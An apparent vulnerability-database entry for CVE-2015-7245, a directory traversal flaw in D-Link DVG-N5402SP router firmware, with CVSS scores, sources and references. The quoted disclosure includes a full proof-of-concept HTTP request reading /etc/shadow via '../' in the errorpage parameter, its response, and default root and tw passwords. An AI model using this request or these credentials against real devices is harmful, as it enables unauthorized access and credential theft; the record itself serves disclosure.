Sign-up

ID

VAR-201704-0218


CVE

CVE-2015-7245


TITLE

D-Link DVG-N5402SP Directory traversal vulnerability in some firmware

Trust: 0.8

sources: JVNDB: JVNDB-2015-007543

DESCRIPTION

Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. ( Dot dot ) including errorpage Important information may be read via parameters. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. An attacker could exploit this vulnerability to read arbitrary files. DLink DVG­N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVG­N5402SP Web Management Model Name : GPN2.4P21­C­CN Firmware Version : W1000CN­00 Firmware Version :W1000CN­03 Firmware Version :W2000EN­00 Hardware Platform :ZS Hardware Version :Gpn2.4P21­C_WIFI­V0.05 Device can be managed through three users: 1. super ­ full privileges 2. admin ­ full privileges 3. support ­ restricted user *1. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgi­bin/webproc HTTP/1.1 Host: <IP>:8080 User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: http://<IP>:8080/cgi­bin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal­>name:getpage; pstVal­>value:html/main.html pstVal­>name:getpage; pstVal­>value:html/index.html pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup pstVal­>name:var:page; pstVal­>value:connected pstVal­>name:var:subpage; pstVal­>value:­ pstVal­>name:obj­action; pstVal­>value:auth pstVal­>name::username; pstVal­>value:super pstVal­>name::password; pstVal­>value:super pstVal­>name::action; pstVal­>value:login pstVal­>name::sessionid; pstVal­>value:1ac5da6b Connection: close Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. *3.Sensitive info leakage via device running configuration backup * *CVE-ID*: CVE-2015-7247 Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clear­text and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

Trust: 2.7

sources: NVD: CVE-2015-7245 // JVNDB: JVNDB-2015-007543 // CNVD: CNVD-2016-01164 // BID: 82754 // VULHUB: VHN-85206 // VULMON: CVE-2015-7245 // PACKETSTORM: 135590

IOT TAXONOMY

category:['IoT', 'Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-01164

AFFECTED PRODUCTS

vendor:d linkmodel:dvg-n5402spscope:eqversion:w1000cn-00

Trust: 2.4

vendor:d linkmodel:dvg-n5402spscope:eqversion:w1000cn-03

Trust: 2.4

vendor:d linkmodel:dvg-n5402spscope:eqversion:w2000en-00

Trust: 2.4

vendor:d linkmodel:dvg\303\202\302\255n5402spscope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2016-01164 // JVNDB: JVNDB-2015-007543 // CNNVD: CNNVD-201602-370 // NVD: CVE-2015-7245

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-7245
value: HIGH

Trust: 1.0

NVD: CVE-2015-7245
value: HIGH

Trust: 0.8

CNVD: CNVD-2016-01164
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201602-370
value: HIGH

Trust: 0.6

VULHUB: VHN-85206
value: MEDIUM

Trust: 0.1

VULMON: CVE-2015-7245
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-7245
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2016-01164
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-85206
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2015-7245
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 3.6
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2016-01164 // VULHUB: VHN-85206 // VULMON: CVE-2015-7245 // JVNDB: JVNDB-2015-007543 // CNNVD: CNNVD-201602-370 // NVD: CVE-2015-7245

PROBLEMTYPE DATA

problemtype:CWE-22

Trust: 1.9

sources: VULHUB: VHN-85206 // JVNDB: JVNDB-2015-007543 // NVD: CVE-2015-7245

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201602-370

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201602-370

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-007543

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-85206 // 
            
            
            
            VULMON: CVE-2015-7245

PATCH
title:Top Pageurl:http://www.dlink.com/uk/en
Trust: 0.8
title:Kenzer Templates [5170] [DEPRECATED]url:https://github.com/ARPSyndicate/kenzer-templates 
Trust: 0.1
sources:
            
            
            VULMON: CVE-2015-7245 // 
            
            
            
            JVNDB: JVNDB-2015-007543

EXTERNAL IDS
db:NVDid:CVE-2015-7245
Trust: 3.6
db:PACKETSTORMid:135590
Trust: 2.7
db:EXPLOIT-DBid:39409
Trust: 1.8
db:BIDid:82754
Trust: 0.9
db:JVNDBid:JVNDB-2015-007543
Trust: 0.8
db:CNNVDid:CNNVD-201602-370
Trust: 0.7
db:CNVDid:CNVD-2016-01164
Trust: 0.6
db:VULHUBid:VHN-85206
Trust: 0.1
db:VULMONid:CVE-2015-7245
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-01164 // 
            
            
            
            VULHUB: VHN-85206 // 
            
            
            
            VULMON: CVE-2015-7245 // 
            
            
            
            BID: 82754 // 
            
            
            
            JVNDB: JVNDB-2015-007543 // 
            
            
            
            PACKETSTORM: 135590 // 
            
            
            
            CNNVD: CNNVD-201602-370 // 
            
            
            
            NVD: CVE-2015-7245

REFERENCES
url:http://packetstormsecurity.com/files/135590/d-link-dvg-n5402sp-path-traversal-information-disclosure.html
Trust: 2.7
url:http://seclists.org/fulldisclosure/2016/feb/24
Trust: 2.1
url:https://www.exploit-db.com/exploits/39409/
Trust: 1.9
url:https://nvd.nist.gov/vuln/detail/cve-2015-7245
Trust: 0.9
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7245
Trust: 0.8
url:http://www.securityfocus.com/bid/82754
Trust: 0.6
url:http://www.dlink.co.in/
Trust: 0.3
url:https://cwe.mitre.org/data/definitions/22.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://github.com/arpsyndicate/kenzer-templates
Trust: 0.1
url:http://<ip>:8080/cgi­bin/webproc
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2015-7247
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2015-7246
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-01164 // 
            
            
            
            VULHUB: VHN-85206 // 
            
            
            
            VULMON: CVE-2015-7245 // 
            
            
            
            BID: 82754 // 
            
            
            
            JVNDB: JVNDB-2015-007543 // 
            
            
            
            PACKETSTORM: 135590 // 
            
            
            
            CNNVD: CNNVD-201602-370 // 
            
            
            
            NVD: CVE-2015-7245

CREDITS
Karn Ganeshen
Trust: 1.0
sources:
            
            
            BID: 82754 // 
            
            
            
            PACKETSTORM: 135590 // 
            
            
            
            CNNVD: CNNVD-201602-370

SOURCES
db:CNVDid:CNVD-2016-01164
db:VULHUBid:VHN-85206
db:VULMONid:CVE-2015-7245
db:BIDid:82754
db:JVNDBid:JVNDB-2015-007543
db:PACKETSTORMid:135590
db:CNNVDid:CNNVD-201602-370
db:NVDid:CVE-2015-7245

LAST UPDATE DATE
2025-04-20T23:13:14.258000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2016-01164date:2016-02-22T00:00:00
db:VULHUBid:VHN-85206date:2017-04-28T00:00:00
db:VULMONid:CVE-2015-7245date:2023-04-26T00:00:00
db:BIDid:82754date:2016-07-05T21:22:00
db:JVNDBid:JVNDB-2015-007543date:2017-05-26T00:00:00
db:CNNVDid:CNNVD-201602-370date:2023-04-27T00:00:00
db:NVDid:CVE-2015-7245date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE
db:CNVDid:CNVD-2016-01164date:2016-02-22T00:00:00
db:VULHUBid:VHN-85206date:2017-04-24T00:00:00
db:VULMONid:CVE-2015-7245date:2017-04-24T00:00:00
db:BIDid:82754date:2016-02-03T00:00:00
db:JVNDBid:JVNDB-2015-007543date:2017-05-26T00:00:00
db:PACKETSTORMid:135590date:2016-02-03T20:32:22
db:CNNVDid:CNNVD-201602-370date:2016-02-19T00:00:00
db:NVDid:CVE-2015-7245date:2017-04-24T18:59:00.163